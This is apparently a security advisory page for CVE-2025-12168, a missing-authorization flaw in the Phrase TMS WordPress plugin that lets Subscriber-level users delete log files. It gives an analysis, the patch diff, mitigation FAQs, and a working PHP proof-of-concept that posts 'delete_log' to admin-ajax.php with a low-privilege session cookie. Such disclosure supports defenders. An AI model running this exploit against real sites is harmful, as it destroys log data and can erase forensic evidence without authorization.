What is CVE-2025-12168?

CVE-2025-12168 is a medium-severity vulnerability in the Phrase TMS Integration for WordPress plugin, specifically affecting versions up to and including 4.7.5. It allows authenticated users, including those with Subscriber-level access, to delete log files due to a missing authorization check on the ‘wp_ajax_delete_log’ AJAX endpoint.

How does the vulnerability work?

The vulnerability exists because the ‘wp_ajax_delete_log’ function does not verify user capabilities or nonce tokens before executing the log deletion. This means that any authenticated user can send a POST request to the AJAX endpoint and delete log files without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the Phrase TMS Integration for WordPress plugin version 4.7.5 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level permissions and above can exploit this flaw to delete logs.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Phrase TMS Integration plugin installed. If it is version 4.7.5 or earlier, your site is at risk. Additionally, you can review your site’s AJAX endpoint behavior to confirm if it allows unauthorized log deletion.

How can I fix this vulnerability?

To fix CVE-2025-12168, update the Phrase TMS Integration for WordPress plugin to version 4.7.6 or later, where the vulnerability has been patched. This update includes the addition of nonce checks and capability verification to the affected AJAX endpoint.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability that poses a moderate risk to system integrity. This means that while the vulnerability does not allow for remote code execution or privilege escalation, it can still lead to unauthorized data modification and potential operational issues.

What are nonce checks and why are they important?

Nonce checks are security tokens used to validate requests in WordPress. They help prevent CSRF (Cross-Site Request Forgery) attacks by ensuring that the request is coming from a legitimate source. In the context of this vulnerability, adding a nonce check prevents unauthorized users from executing the log deletion action.

What is the impact of an attacker exploiting this vulnerability?

If an attacker exploits this vulnerability, they can delete log files from the plugin, potentially erasing evidence of malicious activities. While this does not directly compromise the site or escalate privileges, it can hinder forensic investigations and system integrity.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an authenticated user can send a POST request to the vulnerable AJAX endpoint without any authorization checks. By setting the action parameter to ‘delete_log’ and including a valid session cookie, the attacker can successfully delete log files.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Phrase TMS Integration plugin to prevent exploitation. Additionally, review user permissions and limit access to only those who absolutely need it, especially for Subscriber-level accounts.

Are there any other security measures I should consider?

In addition to updating the plugin, ensure that your WordPress installation is regularly updated, implement strong user roles and permissions, and use security plugins that provide additional monitoring and protection against unauthorized actions.

Where can I find more information about this vulnerability?

More information about CVE-2025-12168 can be found on the National Vulnerability Database (NVD) or through security advisories from WordPress and the plugin developer. Keeping abreast of security updates and advisories is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12168: Phrase TMS Integration for WordPress <= 4.7.5 – Missing Authorization to Authenticated (Subscriber+) Log Deletion (memsource-connector)

CVE ID CVE-2025-12168

Plugin memsource-connector

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.7.5

Patched Version 4.7.6

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12168:
This vulnerability is a missing authorization flaw in the Phrase TMS Integration for WordPress plugin. The ‘wp_ajax_delete_log’ AJAX endpoint lacks capability checks, allowing any authenticated user, including those with Subscriber-level permissions, to delete plugin log files. The CVSS score of 4.3 reflects a medium-severity integrity impact.

Atomic Edge research identifies the root cause in the `memsource_delete_log()` function within the main plugin file `memsource-connector/memsource.php`. The vulnerable function, prior to line 336, executed the `LogUtils::deleteLogFile()` operation without any authorization verification. The function also lacked a nonce check, making it accessible to any authenticated user who could reach the `admin-ajax.php` endpoint with the correct `action` parameter.

The exploitation method involves an authenticated attacker sending a POST request to the WordPress `admin-ajax.php` endpoint. The attacker must set the `action` parameter to `delete_log`. No other parameters were required in the unpatched version. This request could be made by any user with a valid WordPress session, regardless of their assigned role, as the endpoint performed no capability or nonce validation.

The patch introduces two security controls. First, it adds a nonce check via `check_ajax_referer(‘memsource_delete_log_action’, ‘security’)` on line 337. This requires a valid nonce, which the plugin now localizes to the JavaScript via the `memsourceAjax` object. Second, it adds a capability check with `if (current_user_can(“manage_options”))` on line 339. This restricts the function to users with administrator privileges. The same fixes were applied to the related `memsource_zip_and_email_log()` function.

Successful exploitation allows an attacker with minimal privileges to delete the plugin’s log file. This constitutes unauthorized data destruction and could facilitate an attack chain by erasing forensic evidence of other malicious activities. While not a direct path to privilege escalation or remote code execution, it impacts system integrity and operational logging.

Differential between vulnerable and patched code

Code Diff

--- a/memsource-connector/memsource.php
+++ b/memsource-connector/memsource.php
@@ -4,7 +4,7 @@
 Plugin Name: Phrase TMS Integration for WordPress
 Plugin URI: https://support.phrase.com/hc/en-us/articles/5709657294620
 Description: Localize WordPress websites with the help of professional translation tools: translation memories, terminology bases and quality checkers.
-Version: 4.7.5
+Version: 4.7.6
 Text Domain: memsource
 Domain Path: /locale
 Author: Phrase
@@ -17,7 +17,7 @@
 use MemsourceUtilsLogUtils;

 define('MEMSOURCE_PLUGIN_PATH', dirname(__FILE__));
-define('MEMSOURCE_PLUGIN_VERSION', '4.7.5');
+define('MEMSOURCE_PLUGIN_VERSION', '4.7.6');
 define('MEMSOURCE_PLUGIN_DIR_URL', plugin_dir_url(__FILE__));
 define('MEMSOURCE_PLUGIN_REQUIERED_PHP_VERSION', '7.4');

@@ -101,6 +101,17 @@
     wp_enqueue_script('memsource_js');
     wp_enqueue_script('clipboard_js');
     wp_enqueue_style('memsource_css');
+    wp_localize_script(
+        'memsource_js',
+        'memsourceAjax',
+        [
+            'ajaxUrl' => admin_url('admin-ajax.php'),
+            'nonces'  => [
+                'emailLog' => wp_create_nonce('memsource_zip_and_email_log_action'),
+                'deleteLog'   => wp_create_nonce('memsource_delete_log_action'),
+            ],
+        ]
+    );
 }

 function memsource_plugin_setup_menu()
@@ -312,19 +323,27 @@

 function memsource_zip_and_email_log()
 {
-    LogUtils::logSystemInfo();
-    header('Content-Type: application/json');
-    $zipFile = LogUtils::zipAndEmailLogFile();
-    echo json_encode(['zipFile' => $zipFile, 'email' => LogUtils::LOG_EMAIL_RECIPIENT]);
-    wp_die();
+    check_ajax_referer('memsource_zip_and_email_log_action', 'security');
+
+    if (current_user_can("manage_options")) {
+        LogUtils::logSystemInfo();
+        header('Content-Type: application/json');
+        $zipFile = LogUtils::zipAndEmailLogFile();
+        echo json_encode(['zipFile' => $zipFile, 'email' => LogUtils::LOG_EMAIL_RECIPIENT]);
+        wp_die();
+    }
 }

 function memsource_delete_log()
 {
-    header('Content-Type: application/json');
-    $result = LogUtils::deleteLogFile();
-    echo json_encode($result);
-    wp_die();
+    check_ajax_referer('memsource_delete_log_action', 'security');
+
+    if (current_user_can("manage_options")) {
+        header('Content-Type: application/json');
+        $result = LogUtils::deleteLogFile();
+        echo json_encode($result);
+        wp_die();
+    }
 }

 function memsource_delete_post($id)
--- a/memsource-connector/src/Page/AdvancedPage.php
+++ b/memsource-connector/src/Page/AdvancedPage.php
@@ -30,10 +30,11 @@
             function emailToMemsource() {
                 if (confirm("<?php _e('Do you really want to send the log file to Phrase?', 'memsource'); ?>")) {
                     var data = {
-                        action: 'zip_and_email_log'
+                        action: 'zip_and_email_log',
+                        security: memsourceAjax.nonces.emailLog
                     };
                     jQuery('#email-spinner').addClass('is-active');
-                    jQuery.post(ajaxurl, data, function(response) {
+                    jQuery.post(memsourceAjax.ajaxUrl, data, function(response) {
                         jQuery('#email-spinner').removeClass('is-active');
                         jQuery('#email-result').html('File ' + response.zipFile + ' has been sent to Phrase.');
                     });
@@ -42,10 +43,11 @@
             function deleteLogFile() {
                 if (confirm("<?php _e('Do you really want to delete the log file?', 'memsource'); ?>")) {
                     var data = {
-                        action: 'delete_log'
+                        action: 'delete_log',
+                        security: memsourceAjax.nonces.deleteLog
                     };
                     jQuery('#delete-spinner').addClass('is-active');
-                    jQuery.post(ajaxurl, data, function(response) {
+                    jQuery.post(memsourceAjax.ajaxUrl, data, function(response) {
                         jQuery('#delete-spinner').removeClass('is-active');
                         var files = [];
                         if (response.logDeleted) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12168 - Phrase TMS Integration for WordPress <= 4.7.5 - Missing Authorization to Authenticated (Subscriber+) Log Deletion

<?php
// Configure the target WordPress site URL
$target_url = 'http://vulnerable-wordpress-site.com';

// WordPress admin AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Set the vulnerable action parameter
$post_data = array('action' => 'delete_log');

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// Set cookies for an authenticated Subscriber session
// Replace with a valid logged-in cookie from a low-privilege user
$cookie = 'wordpress_logged_in_xxxxxxxx=subscriber%7Cxxxxxxxxxxxxx';
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Cookie: ' . $cookie));

// Execute the request to trigger the log deletion
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the result
echo "HTTP Response Code: $http_coden";
echo "Response Body:n";
// Extract body from full response
$header_size = strpos($response, "rnrn") + 4;
$body = substr($response, $header_size);
echo $body . "n";

// Check for success indicators in the JSON response
if ($http_code == 200 && strpos($body, '"logDeleted":true') !== false) {
    echo "[+] SUCCESS: Log file deletion likely successful.n";
} else {
    echo "[-] The exploit may have failed or the target is patched.n";
}
?>

Frequently Asked Questions

What is CVE-2025-12168?
Overview of the vulnerability
CVE-2025-12168 is a medium-severity vulnerability in the Phrase TMS Integration for WordPress plugin, specifically affecting versions up to and including 4.7.5. It allows authenticated users, including those with Subscriber-level access, to delete log files due to a missing authorization check on the ‘wp_ajax_delete_log’ AJAX endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists because the ‘wp_ajax_delete_log’ function does not verify user capabilities or nonce tokens before executing the log deletion. This means that any authenticated user can send a POST request to the AJAX endpoint and delete log files without proper authorization.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Phrase TMS Integration for WordPress plugin version 4.7.5 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level permissions and above can exploit this flaw to delete logs.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Phrase TMS Integration plugin installed. If it is version 4.7.5 or earlier, your site is at risk. Additionally, you can review your site’s AJAX endpoint behavior to confirm if it allows unauthorized log deletion.
How can I fix this vulnerability?
Recommended actions
To fix CVE-2025-12168, update the Phrase TMS Integration for WordPress plugin to version 4.7.6 or later, where the vulnerability has been patched. This update includes the addition of nonce checks and capability verification to the affected AJAX endpoint.
What does the CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability that poses a moderate risk to system integrity. This means that while the vulnerability does not allow for remote code execution or privilege escalation, it can still lead to unauthorized data modification and potential operational issues.
What are nonce checks and why are they important?
Security mechanism explained
Nonce checks are security tokens used to validate requests in WordPress. They help prevent CSRF (Cross-Site Request Forgery) attacks by ensuring that the request is coming from a legitimate source. In the context of this vulnerability, adding a nonce check prevents unauthorized users from executing the log deletion action.
What is the impact of an attacker exploiting this vulnerability?
Consequences of successful exploitation
If an attacker exploits this vulnerability, they can delete log files from the plugin, potentially erasing evidence of malicious activities. While this does not directly compromise the site or escalate privileges, it can hinder forensic investigations and system integrity.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of exploitation
The proof of concept provided illustrates how an authenticated user can send a POST request to the vulnerable AJAX endpoint without any authorization checks. By setting the action parameter to ‘delete_log’ and including a valid session cookie, the attacker can successfully delete log files.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Phrase TMS Integration plugin to prevent exploitation. Additionally, review user permissions and limit access to only those who absolutely need it, especially for Subscriber-level accounts.
Are there any other security measures I should consider?
Best practices for WordPress security
In addition to updating the plugin, ensure that your WordPress installation is regularly updated, implement strong user roles and permissions, and use security plugins that provide additional monitoring and protection against unauthorized actions.
Where can I find more information about this vulnerability?
Further resources
More information about CVE-2025-12168 can be found on the National Vulnerability Database (NVD) or through security advisories from WordPress and the plugin developer. Keeping abreast of security updates and advisories is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations